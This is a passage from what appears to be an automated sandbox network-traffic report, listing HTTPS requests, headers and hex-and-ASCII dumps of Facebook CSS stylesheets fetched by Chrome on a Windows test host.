                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: YDTKm8pkP/LnCyvn//h65A==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 11:38:56 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 0Cm4GtK/W3mf8Ss5gzjsApqBYo8ZADRHi0u7Z6AX5M6weTXbRYwH5r08n/5EGLimAXTBb3BjDQ7UXp2Y7dzRvw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:17 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=9, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 536282
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC15878INData Raw: 78 31 38 6c 31 39 6b 64 7b 2d 2d 61 63 63 65 6e 74 3a 76 61 72 28 2d 2d 2d 2d 61 63 63 65 6e 74 2c 72 65 76 65 72 74 29 7d 2e 78 31 62 30 35 38 30 61 7b 2d 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 76 61 72 28 2d 2d 2d 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 2c 72 65 76 65 72 74 29 7d 2e 78 31 69 32 75 67 31 6e 7b 2d 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 2d 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 72 65 76 65 72 74 29 7d 2e 78 31 6f 62 79 6d 71 78 7b 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 76 61 72 28 2d 2d 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2c 72 65 76 65 72 74 29 7d 2e 78 31 76 35 65 32 68 65 7b 2d 2d 73 65 63 6f 6e 64 61 72 79 2d
                                                                                                                                                                                                                                Data Ascii: x18l19kd{--accent:var(----accent,revert)}.x1b0580a{--primary-text:var(----primary-text,revert)}.x1i2ug1n{--primary-button-background:var(----primary-button-background,revert)}.x1obymqx{--secondary-text:var(----secondary-text,revert)}.x1v5e2he{--secondary-
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 35 74 7b 2d 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 78 31 6c 77 32 6f 63 30 7b 2d 2d 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 74 65 78 74 3a 23 66 66 66 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 31 6d 31 6d 33 39 6e 2d 42 7b 30 25 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 36 2e 33 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 39 30 64 65 67 29 7d 32 35 25 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 32 38 2e 33 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 36 32 64 65 67 29 7d 35 30 25 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 34 2e 31 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 37 32 64 65 67 29 7d 37 35 25
                                                                                                                                                                                                                                Data Ascii: 5t{--input-background:transparent}.x1lw2oc0{--primary-button-text:#fff}@keyframes x1m1m39n-B{0%{stroke-dashoffset:6.3px;transform:rotate(-90deg)}25%{stroke-dashoffset:28.3px;transform:rotate(162deg)}50%{stroke-dashoffset:14.1px;transform:rotate(72deg)}75%
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 65 72 3a 20 63 6f 61 72 73 65 29 7b 2e 78 31 39 70 7a 73 74 65 2e 78 31 39 70 7a 73 74 65 7b 2d 2d 6e 61 76 2d 6c 69 73 74 2d 63 65 6c 6c 2d 6d 69 6e 2d 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 61 62 72 61 2d 74 6f 75 63 68 2d 6e 61 76 2d 6c 69 73 74 2d 63 65 6c 6c 2d 6d 69 6e 2d 68 65 69 67 68 74 29 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 37 39 70 78 29 7b 2e 78 39 72 7a 63 65 7a 2e 78 39 72 7a 63 65 7a 7b 2d 2d 64 69 61 6c 6f 67 2d 61 6e 63 68 6f 72 2d 76 65 72 74 69 63 61 6c 2d 70 61 64 64 69 6e 67 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 37 39 70 78 29 7b 2e 78 69 6b 79 33 34 63 2e 78 69 6b 79 33 34 63 7b 2d 2d 64 69 61 6c 6f 67 2d 63 6f 72 6e 65 72 2d 72 61 64 69 75 73 3a 30 7d 7d 40 6d 65 64 69
                                                                                                                                                                                                                                Data Ascii: er: coarse){.x19pzste.x19pzste{--nav-list-cell-min-height:var(--abra-touch-nav-list-cell-min-height)}}@media (max-width: 679px){.x9rzcez.x9rzcez{--dialog-anchor-vertical-padding:0}}@media (max-width: 679px){.xiky34c.xiky34c{--dialog-corner-radius:0}}@medi
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 61 6e 30 64 37 2e 78 36 61 6e 30 64 37 7b 66 6c 65 78 3a 30 20 31 20 61 75 74 6f 7d 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2e 78 70 6e 78 79 62 39 2e 78 70 6e 78 79 62 39 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 78 71 7a 36 68 6d 66 2e 78 71 7a 36 68 6d 66 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 64 69 76 69 64 65 72 29 7d 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 20 61 63 74 69 76 65 29 7b 2e 78 76 65 74 7a 31 39 2e 78 76 65 74 7a 31 39 7b 6f 75 74 6c 69 6e 65 3a 76 61 72 28 2d 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 6f 75 74 6c 69 6e 65 2d 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 29 7d
                                                                                                                                                                                                                                Data Ascii: an0d7.x6an0d7{flex:0 1 auto}}@media print{.xpnxyb9.xpnxyb9{border-top:none}}@media (max-width: 767px){.xqz6hmf.xqz6hmf{border-bottom:1px solid var(--divider)}}@media (forced-colors: active){.xvetz19.xvetz19{outline:var(--focus-ring-outline-forced-colors)}
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1500INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 78 35 65 64 37 72 66 2d 42 7d 2e 78 31 34 73 66 77 6f 64 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 65 33 31 63 31 64 7d 2e 78 31 34 75 6e 79 30 6f 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 78 31 34 76 30 73 6d 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7d 2e 78 31 34 76 31 72 6a 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 72 65 70 65 61 74 28 32 2c 34 39 2e 30 37 25 29 7d 2e 78 31 34 77 32 62 68 63 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 23 65 62 65 62 65 62 7d 2e 78 31 34 77 69 34 78 77 7b 74 65 78 74 2d 61 6c 69 67 6e
                                                                                                                                                                                                                                Data Ascii: animation-name:x5ed7rf-B}.x14sfwod{border-right-color:#e31c1d}.x14uny0o{padding-right:15px}.x14v0smp{background-color:var(--button-primary-background)}.x14v1rj{grid-template-columns:repeat(2,49.07%)}.x14w2bhc{border-left-color:#ebebeb}.x14wi4xw{text-align
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC14884INData Raw: 67 73 35 31 7b 63 6f 6c 6f 72 3a 23 61 62 33 62 63 64 7d 2e 78 31 35 62 6a 62 36 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 78 31 35 63 61 6a 62 79 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 5a 28 39 30 64 65 67 29 7d 2e 78 31 35 63 71 61 67 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 38 31 39 31 61 7d 2e 78 31 35 64 31 62 32 6e 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 64 65 65 6d 70 68 61 73 69 7a 65 64 2d 62 75 74 74 6f 6e 2d 74 65 78 74 29 7d 2e 78 31 35 64 36 62 6c 71 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 38 25 7d 2e 78 31 35 64 77 33 79 74 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 32 70 78 20 76 61 72 28
                                                                                                                                                                                                                                Data Ascii: gs51{color:#ab3bcd}.x15bjb6t{line-height:inherit}.x15cajby{transform:rotateZ(90deg)}.x15cqagf{background-color:#18191a}.x15d1b2n{border-left-color:var(--primary-deemphasized-button-text)}.x15d6blq{margin-right:-8%}.x15dw3yt{box-shadow:inset 0 0 0 2px var(
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 77 3a 30 20 2d 38 70 78 20 38 70 78 20 76 61 72 28 2d 2d 63 61 72 64 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7d 2e 78 31 39 6d 76 67 68 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 76 61 72 28 2d 2d 61 6c 77 61 79 73 2d 64 61 72 6b 2d 6f 76 65 72 6c 61 79 29 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 7d 2e 78 31 39 6e 32 72 77 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 32 70 78 20 76 61 72 28 2d 2d 61 63 63 65 6e 74 29 7d 2e 78 31 39 6e 70 64 73 68 7b 63 6f 6c 75 6d 6e 2d 67 61 70 3a 32 2e 38 36 25 7d 2e 78 31 39 6e 71 67 39 39 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 46 61 63 65 62 6f 6f 6b 20 53 61 6e 73 20 41 70 70 20 48 65 61 76 79 21 69 6d 70 6f 72 74 61 6e 74 7d 2e
                                                                                                                                                                                                                                Data Ascii: w:0 -8px 8px var(--card-background)}.x19mvghd{background-image:linear-gradient(180deg,var(--always-dark-overlay),transparent)}.x19n2rwr{box-shadow:0 0 0 2px var(--accent)}.x19npdsh{column-gap:2.86%}.x19nqg99{font-family:Facebook Sans App Heavy!important}.
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 75 7b 66 6c 65 78 2d 67 72 6f 77 3a 2e 39 32 7d 2e 78 31 65 66 74 6f 6f 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 35 72 65 6d 7d 2e 78 31 65 67 34 39 70 37 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 69 63 6f 6e 29 7d 2e 78 31 65 67 62 69 75 30 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 69 6d 61 72 79 2d 64 65 65 6d 70 68 61 73 69 7a 65 64 2d 62 75 74 74 6f 6e 2d 70 72 65 73 73 65 64 29 7d 2e 78 31 65 67 6a 6b 6a 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 65 63 6f 6e 64 61 72 79 2d 68 6f 76 65 72 29 7d 2e 78 31 65 67 6a 79 6e 71 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 38 70 78 7d 2e 78 31 65
                                                                                                                                                                                                                                Data Ascii: u{flex-grow:.92}.x1eftoo1{font-size:.5rem}.x1eg49p7{border-left-color:var(--secondary-icon)}.x1egbiu0{background-color:var(--primary-deemphasized-button-pressed)}.x1egjkj9{background-color:var(--background-secondary-hover)}.x1egjynq{padding-left:18px}.x1e
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC14884INData Raw: 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 66 64 62 33 32 61 7d 2e 78 31 6a 70 67 68 39 35 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 78 31 6a 70 6c 6a 6d 76 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 61 72 6f 75 6e 64 7d 2e 78 31 6a 71 30 61 67 77 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 32 38 70 78 7d 2e 78 31 6a 71 6c 31 6b 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 33 70 78 7d 2e 78 31 6a 71 6c 65 72 61 7b 6c 65 66 74 3a 37 30 25 7d 2e 78 31 6a 71 79 6c 6b 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 78 31 6a 72 63 6d 38 35 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 78 31 39 34 31 6d 6c 72 2d 42 7d 2e
                                                                                                                                                                                                                                Data Ascii: der-right-color:#fdb32a}.x1jpgh95{transform-origin:center center}.x1jpljmv{align-content:space-around}.x1jq0agw{border-bottom-left-radius:28px}.x1jql1k0{margin-left:-23px}.x1jqlera{left:70%}.x1jqylkn{margin-right:15px}.x1jrcm85{animation-name:x1941mlr-B}.


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.449767157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC604OUTGET /rsrc.php/v3/yy/l/0,cross/_PStGDb9Db2.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: q2RsNBm0lNDw66XgqoiE6w==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 21:23:53 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: acLcIazTM78m7KuPb/2h+/v3BWe8cdIvEP47i/vJeudzO0t2MR5PLUQz8pFKCU4GGRDU013h5FB7ym/BbyaGTg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:17 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 135216
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC15878INData Raw: 5f 35 33 69 6a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 63 61 72 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 20 23 46 46 46 46 46 46 29 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 5f 35 33 69 6f 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 5f 35 33 69 68 20 2e 5f 35 33 69 6f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 2e 5f 35 34 61 66 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 5f 35 34 61 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 72 2f 5f 50 53 73 4e 7a 36 54 61 37 72 2e 70 6e
                                                                                                                                                                                                                                Data Ascii: _53ij{background:#fff;background:var(--card-background, #FFFFFF);position:relative}._53io{overflow:hidden;position:absolute}._53ih ._53io{display:none}._54af{padding:5px 0 3px;text-align:center}._54ag{background-image:url(/rsrc.php/v3/y_/r/_PSsNz6Ta7r.pn
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 32 36 6b 39 32 61 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 77 72 61 70 7d 2e 78 31 32 37 6c 68 62 35 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 78 65 6b 76 36 6e 77 2d 42 7d 2e 78 31 32 38 31 65 78 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 70 72 65 73 73 65 64 29 7d 2e 78 31 32 63 73 6e 68 63 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 76 61 72 28 2d 2d 78 71 79 38 38 73 35 29 7d 2e 78 31 32 67 6f 39 73 39 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 39 39 39 70 78 7d 2e 78 31 32 6a 72 33 30 36 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 34 37 25 2c 31 39 33 25 29 20 72 6f 74 61 74 65 28 2d 35 64 65 67 29
                                                                                                                                                                                                                                Data Ascii: 26k92a{white-space:pre-wrap}.x127lhb5{animation-name:xekv6nw-B}.x1281ex9{background-color:var(--secondary-button-pressed)}.x12csnhc{text-transform:var(--xqy88s5)}.x12go9s9{border-top-right-radius:999px}.x12jr306{transform:translate(47%,193%) rotate(-5deg)
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 61 72 64 29 7d 2e 78 31 69 75 74 76 73 7a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 65 73 73 2d 6f 76 65 72 6c 61 79 29 7d 2e 78 31 69 75 77 69 30 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 29 7d 2e 78 31 69 79 6a 71 6f 32 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 2e 78 31 6a 30 37 79 78 76 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 78 31 73 77 76 71 76 39 29 7d 2e 78 31 6a 30 74 72 34 64 7b 66 6c 65 78 2d 62 61 73 69 73 3a 28 31 30 30 20 2f 20 33 29 25 7d 2e 78 31 6a 32 30 6d 68 39 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 32 73 7d 2e 78 31 6a 33 62 35 63 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 78 6e 68 62
                                                                                                                                                                                                                                Data Ascii: ard)}.x1iutvsz{background-color:var(--press-overlay)}.x1iuwi03{background-color:var(--secondary-text)}.x1iyjqo2{flex-grow:1}.x1j07yxv{font-size:var(--x1swvqv9)}.x1j0tr4d{flex-basis:(100 / 3)%}.x1j20mh9{transition-duration:2s}.x1j3b5cy{font-size:var(--xnhb
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 7d 2e 78 33 32 33 66 31 78 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 76 61 72 28 2d 2d 78 31 67 68 68 37 6a 67 29 7d 2e 78 33 36 31 72 76 71 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 74 65 78 74 2d 69 6e 70 75 74 2d 66 69 65 6c 64 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 29 2c 73 79 73 74 65 6d 2d 75 69 2c 73 61 6e 73 2d 73 65 72 69 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 78 33 39 65 65 63 76 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 70 78 7d 2e 78 33 39 69 6e 6e 63 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 29 7d 2e 78 33 39 76 69 77 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 34 65 36 65 62 7d 2e 78 33 61 6a 6c 64
                                                                                                                                                                                                                                Data Ascii: }.x323f1x{letter-spacing:var(--x1ghh7jg)}.x361rvq{font-family:var(--text-input-field-font-family),system-ui,sans-serif!important}.x39eecv{margin-left:-1px}.x39innc{border-right-color:var(--secondary-button-stroke)}.x39viwf{background-color:#e4e6eb}.x3ajld
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1500INData Raw: 74 65 28 31 32 33 25 2c 31 32 33 25 29 7d 2e 78 6c 31 78 76 31 72 7b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 7d 2e 78 6c 33 37 68 69 31 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 74 65 78 74 2d 62 61 64 67 65 2d 63 6f 72 6e 65 72 2d 72 61 64 69 75 73 29 7d 2e 78 6c 34 32 33 74 71 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 30 30 70 78 7d 2e 78 6c 34 6b 36 64 75 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 32 25 2c 31 38 38 25 29 7d 2e 78 6c 35 32 31 73 6d 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 35 70 78 7d 2e 78 6c 35 36 6a 37 6b 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 78 6c 36 61 73 6b 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f
                                                                                                                                                                                                                                Data Ascii: te(123%,123%)}.xl1xv1r{object-fit:cover}.xl37hi1{border-top-right-radius:var(--text-badge-corner-radius)}.xl423tq{margin-left:-100px}.xl4k6du{transform:translate(2%,188%)}.xl521sm{padding-right:25px}.xl56j7k{justify-content:center}.xl6askr{border-right-co
